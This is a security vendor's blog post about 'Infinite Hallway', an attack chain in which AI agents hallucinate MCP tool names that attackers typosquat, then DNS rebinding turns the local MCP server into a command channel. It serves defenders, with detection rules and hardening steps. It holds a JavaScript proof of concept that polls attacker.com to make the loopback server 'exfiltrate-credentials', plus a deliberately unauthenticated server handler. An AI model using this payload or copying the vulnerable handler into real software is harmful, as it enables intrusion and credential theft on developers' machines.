Infinite Hallway: How Hallucinated MCP Servers Become Attacker C2 on the Loopback

M
Maya Levi
Infinite Hallway: How Hallucinated MCP Servers Become Attacker C2 on the Loopback
Share
"The Labyrinth's secret was never the monster at its center. It was that every corridor looked like the way out."

Executive summary

The Arrakis Threats Catalog files Plugin/MCP Supply Chain Compromise as T1.1 - a Configuration & Setup layer threat at the Deploy stage, currently scoring CRITICAL (Likelihood 4 × Impact 5 = 20) and mapped to OWASP LLM03 Supply Chain plus MITRE ATLAS Initial Access and Execution. The takeaway is simple: the moment an AI agent is allowed to discover and install its own tools, your supply chain is no longer human-reviewed - and attackers already know it.

We track one of its sharpest expressions under the codename Infinite Hallway - the hallucinated MCP tool that opens a door the agent never built, and that quietly leads back into the network.

  • The LLM attack surface has shifted from the prompt box to the protocol and tool layer.
  • Attackers chain hallucinated package names with typosquatting and DNS rebinding to turn loopback MCP servers into a C2 channel.
  • The blast radius is RCE plus broad credential theft from every service the local MCP can reach.
  • Immediate actions: block unauthenticated MCP servers, enforce cryptographic signing, and validate Origin and Host on every endpoint - including loopback.
Daedalus built the Labyrinth so no one inside could tell where they were. The Infinite Hallway works the same way - every door looks like the one the agent meant to open, only one leads back to your own machine.
Daedalus built the Labyrinth so no one inside could tell where they were. The Infinite Hallway works the same way - every door looks like the one the agent meant to open, only one leads back to your own machine.
🛡️
Why Arrakis matters here: Infinite Hallway lives in the seams between registry, manifest, and loopback - the exact surface Arrakis treats as a first-class control plane.

The origin story

The realization that AI ecosystems were suffering from critical supply chain vulnerabilities crystallized with the proliferation of the Model Context Protocol (MCP). Organizations raced to give isolated agents the ability to do things - read local files, query internal databases, fetch real-time web data - and ended up deploying agents with third-party plugins and MCP servers that had not been properly vetted.

This is precisely why the Arrakis catalog files T1.1 at the Configuration & Setup layer rather than treating it as a runtime exploit: by the time the agent is reasoning, the trust decision has already been made. The infrastructure connecting the AI's brain to the enterprise's hands routinely lacks authentication and integrity verification, and adversaries have stopped trying to trick the model with riddles at the gate. They have moved one layer down - to registry recon and protocol abuse.


The technical autopsy: Infinite Hallway end-to-end

Janus at the gate. One face shows the public internet. The other opens directly onto the developer's machine - and the request walks through both without noticing the difference.
Janus at the gate. One face shows the public internet. The other opens directly onto the developer's machine - and the request walks through both without noticing the difference.

The chain only works because every step looks like the step before it.

Most writeups treat typosquatting and DNS rebinding as parallel vectors. In Infinite Hallway they are not - they are sequential moves in the same campaign. Here is the chain in the order it actually unfolds:

  1. Hallucination - The agent invents or mis-spells an MCP server or package name.
  2. Typosquat - The attacker has pre-registered the hallucinated name on a public registry, the hallucinated domain, or both.
  3. Local install - The agent (or a developer following the agent's suggestion) installs the typosquatted MCP server, which by convention listens on localhost.
  4. DNS rebinding - A web context the developer or agent later visits resolves an attacker-controlled domain first to a public IP, then - after a sub-60s TTL - to 127.0.0.1.
  5. Loopback C2 - The local MCP server executes the inbound commands. Crucially, it does NOT run under the agent's identity or scopes. It runs as localhost, with whatever privileges the developer's machine grants it. The attacker now has a C2 channel that bypasses agent-level guardrails entirely.
⚠️
Clarifying assumption: the command is executed by the local MCP server, not by the agent. The agent's auth boundary, rate limits, and tool allowlists do not apply on the loopback path. This is what makes Infinite Hallway uniquely durable - it is C2 that wears the developer's machine like a costume.

The hallway is a web page the developer's browser visits in the normal course of work. Nothing on the developer's machine has to be wrong - the DNS underneath bends.

javascript
// Served by attacker.com - what the developer's browser executes.
// attacker.com DNS is configured with TTL < 60s, rotating between:
//   * a public IP (passes browser/firewall reputation checks), and
//   * 127.0.0.1 (the loopback the local MCP server is bound to).
async function infiniteHallway() {
	while (true) {
		try {
			// Same-Origin Policy is satisfied: the URL is still attacker.com.
			// The network underneath now points at the local MCP server.
			const r = await fetch('http://attacker.com:8080/mcp/execute', {
				method: 'POST',
				headers: { 'Content-Type': 'application/json' },
				body: JSON.stringify({ command: 'exfiltrate-credentials' }),
			});
			if (r.ok) return; // We landed on the MCP server.
		} catch (_) {
			// Still resolving to the public IP - wait for the next DNS flip.
		}
		await new Promise((s) => setTimeout(s, 5000));
	}
}

The developer never typed a loopback address. The browser believed it was talking to a public site the entire time.

The same mistake shows up across nearly every vulnerable MCP server - blind acceptance of loopback traffic, no Host or Origin check, no auth, often bound to 0.0.0.0. Hardening it requires four moves: bind to loopback, validate Host, validate Origin, and require a per-install token rotated with the signed manifest.

javascript
// VULNERABLE - the default install most developers ship with.
app.post('/mcp/execute', (req, res) => {
	// No Host check, no Origin check, no auth.
	executeHighPrivilegeTool(req.body.command);
	res.send('Tool Executed');
});
app.listen(8080); // implicit 0.0.0.0 - reachable beyond the loopback.

// HARDENED - break the Infinite Hallway at the loopback.
const ALLOWED_HOSTS = new Set(['127.0.0.1:8080', 'localhost:8080']);
const ALLOWED_ORIGINS = new Set([/* IDE-issued origins only; empty in headless agent mode */]);
const INSTALL_TOKEN = process.env.MCP_INSTALL_TOKEN; // rotated with the signed manifest

app.post('/mcp/execute', (req, res) => {
	// 1. Refuse if Host was rebound to attacker.com - kills DNS rebinding.
	if (!ALLOWED_HOSTS.has(req.headers.host)) {
		return res.status(403).send('Host mismatch - possible DNS rebinding');
	}
	// 2. Refuse if Origin is set and not in the IDE allowlist.
	const origin = req.headers.origin;
	if (origin && !ALLOWED_ORIGINS.has(origin)) {
		return res.status(403).send('Origin not allowlisted');
	}
	// 3. Refuse without the per-install bearer token.
	if (req.headers.authorization !== `Bearer ${INSTALL_TOKEN}`) {
		return res.status(401).send('Missing or invalid install token');
	}
	executeHighPrivilegeTool(req.body.command);
	res.send('Tool Executed');
});

// 4. Bind explicitly to loopback. Never 0.0.0.0 in dev or prod.
app.listen(8080, '127.0.0.1');

If your MCP server trusts the loopback interface, you have outsourced authentication to whoever spoofs the Host header first.

Framework mapping:

  • MITRE ATLAS: AML.T0010 (ML Supply Chain Compromise), AML.T0011 (User Execution).
  • OWASP LLM Top 10: LLM03 Supply Chain, LLM07 Insecure Plugin Design.

The attacker's playbook and attribution

A registry under attack does not look broken. It looks crowded - with copies.

The hall of Eidola. Every bust is a perfect copy - except one. Registry recon is just the modern art of carving the wrong twin.
The hall of Eidola. Every bust is a perfect copy - except one. Registry recon is just the modern art of carving the wrong twin.
🔎
Arrakis tracking note: registry-recon dwell times have shrunk from weeks to hours. Once a maintainer publishes a new MCP package, typosquat candidates appear on adjacent registries faster than most organizations refresh their internal allowlists. The window for human-only review has closed.

Threat actors targeting the MCP and plugin ecosystem are methodical. They operate on the assumption that organizations are deploying AI capabilities faster than security teams can audit integration code. They scrape GitHub and npm for newly published MCP tools, watch for popular repositories with weak maintainer security, and pre-register names that match common LLM hallucinations. They are not breaking the original package - they are publishing its double.

Once a foothold is achieved via a typosquatted package or a compromised update, the objective is rapid vertical escalation. MCP servers typically hold the credentials needed to access internal databases, file systems, and corporate SaaS - so a single compromised plugin often produces RCE plus credential theft across every connected service.


The fallout (systemic failure)

This is a repeat of historical cybersecurity mistakes, ported into the AI era. We built a massive ecosystem of agents and protocols that frequently fail to enforce basic web security primitives.

Unauthenticated MCP servers exposed in production are a catastrophic failure of basic network hygiene. Reliance on public registries without strict manifest integrity - allowing installations with mismatched checksums or absent from trusted registries - effectively outsources perimeter security to unverified contributors.

🧭
Arrakis perspective: the durable fix is not another scanner bolted onto CI. It is treating the AI tool layer - registries, manifests, MCP endpoints, tool schemas - as a first-class control plane, with the same provenance, signing, and runtime attestation we already demand of code itself.

Governance and compliance posture

Where Infinite Hallway sits in your control map:

  • Third-party and AI supply chain risk - Treat MCP servers and agent plugins as third-party software. They belong in the same vendor-risk and SBOM workflow as any other dependency, with provenance, signing, and attestations recorded at install time.
  • Change management - Tool definitions are configuration. A schema change to an approved MCP tool is a change-control event, not a silent update; it should generate the same audit trail as a firewall rule change.
  • Segregation of duties - Autonomous tool discovery by an agent is, in effect, an unreviewed production deployment. Require a human approver in the loop for any new MCP server entering an environment that touches regulated data.
  • Audit and evidence - Maintain an immutable record of every MCP package installed, its signature, and the approver. Without this record, post-incident scoping for an Infinite Hallway-class compromise is effectively impossible.

Mapping to common frameworks:

  • NIST AI RMF - Govern 1.4 (third-party risk), Manage 4.1 (incident response readiness for AI components).
  • ISO/IEC 42001 - A.6.2.6 (AI system supply chain), A.8.4 (data and tool integrity).
  • SOC 2 (CC) - CC3.2 (vendor risk), CC7.1 (anomaly detection), CC8.1 (change management).

Detection and implementation checklist

The mitigations break cleanly into two lanes. Both are paste-ready.

Detection lane (SIEM / EDR rules):

Alert on DNS responses with TTL < 60s for any domain accessed by an AI agent or developer IDE process.
Alert on any domain that resolves to a public IP and then to a private or loopback IP within a single session.
Alert on outbound traffic from localhost-bound MCP processes to any non-allowlisted domain.
Alert on package install events where the requested name has high Levenshtein similarity to a known-popular MCP package but is not in the internal allowlist.
Alert on MCP tool-schema drift between sessions (hash mismatch on tool definition).
Alert on MCP endpoints accepting requests with missing or mismatched Origin or Host headers.

Implementation lane:

Require cryptographic signing on every MCP server package; block unsigned installs.
Pin MCP tool definitions (hash + version) at approval time; require re-approval on drift.
Enforce Origin and Host validation on every MCP endpoint, including loopback.
Require authentication on all MCP endpoints in production - no implicit loopback trust.
Maintain an internal allowlist registry; block public-registry installs by default.
Block installs of packages whose names are within an edit-distance threshold of allowlisted packages but are not themselves allowlisted.
Disable autonomous tool discovery in production agents; require human-in-the-loop for new tool registration.

How Arrakis secures the AI tool layer

Arrakis collapses the Infinite Hallway chain at the three points where it actually fires: the registry, the manifest, and the loopback. Continuous registry intelligence catches typosquats and hallucinated names before they enter the build. Manifest signing and tool-schema pinning turn every MCP install into a signed, version-locked event with an audit trail. Runtime attestation on the MCP endpoint enforces authentication plus Origin and Host validation, so a rebound request is dropped at the loopback rather than discovered after execution. Net effect: the AI tool layer is treated as a first-class control plane, with the same provenance and runtime rigor security teams already apply to code and network.


Validated indicators (Infinite Hallway)

Indicator TypeValueDescription
Attack vectorDNS rebindingProtocol-level exploit that leverages rapid DNS resolution changes to bypass the Same-Origin Policy.
Telemetry anomalyTTL < 60sRapid DNS TTL changes for domains accessed by agents. Primary indicator of DNS rebinding setup.
Telemetry anomalyPublic -> private IP resolutionDNS responses that resolve to a loopback or private IP after initially resolving to a public IP.
Registry anomalyHigh package-name similarityRequested package name is suspiciously similar to a popular package, indicating likely typosquatting.
Configuration vulnerabilityUnauthenticated endpointsMCP servers running without authorization and without Origin or Host validation.
Behavioral anomalyLocalhost MCP outboundA localhost-bound MCP process initiating outbound traffic to non-allowlisted domains - candidate attacker C2.

Stay in the loop

Get the latest from Arrakis Security delivered to your inbox.

Related Articles